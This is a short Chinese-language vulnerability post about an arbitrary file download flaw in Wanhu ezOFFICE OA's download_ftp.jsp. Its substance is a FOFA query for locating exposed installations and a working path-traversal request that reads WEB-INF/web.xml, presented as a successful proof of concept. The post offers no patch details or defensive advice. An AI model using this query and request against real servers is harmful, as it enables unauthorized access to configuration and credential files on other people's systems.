万户OA download_ftp.jsp 任意文件下载漏洞

漏洞描述

万户软件网络是业内普遍认可的智慧政务办公专家,OA系统国家行业标准编制组长单位,协同软件国家行业标准编制组长单位,22年专注协同管理领域.为您提供定制化的智慧政务一体化办公解决方案。万户OAdownload_ftp.jsp文件存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件。
 


 

fofa

app="万户网络-ezOFFICE"

 


 

漏洞复现

图片[1]-万户OA download_ftp.jsp 任意文件下载漏洞-孤勇者社区

1.执行POC,读取成功web.xml文件成功

/defaultroot/download_ftp.jsp?path=/../WEB-INF/&name=aaa&FileName=web.xml

图片[2]-万户OA download_ftp.jsp 任意文件下载漏洞-孤勇者社区
 

------本页内容已结束,喜欢请分享------

感谢您的来访,获取更多精彩文章请收藏本站。

© 版权声明
THE END
喜欢就支持一下吧
点赞11赞赏 分享
评论 共2条
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片
    • 头像洒王0
    • 头像场王0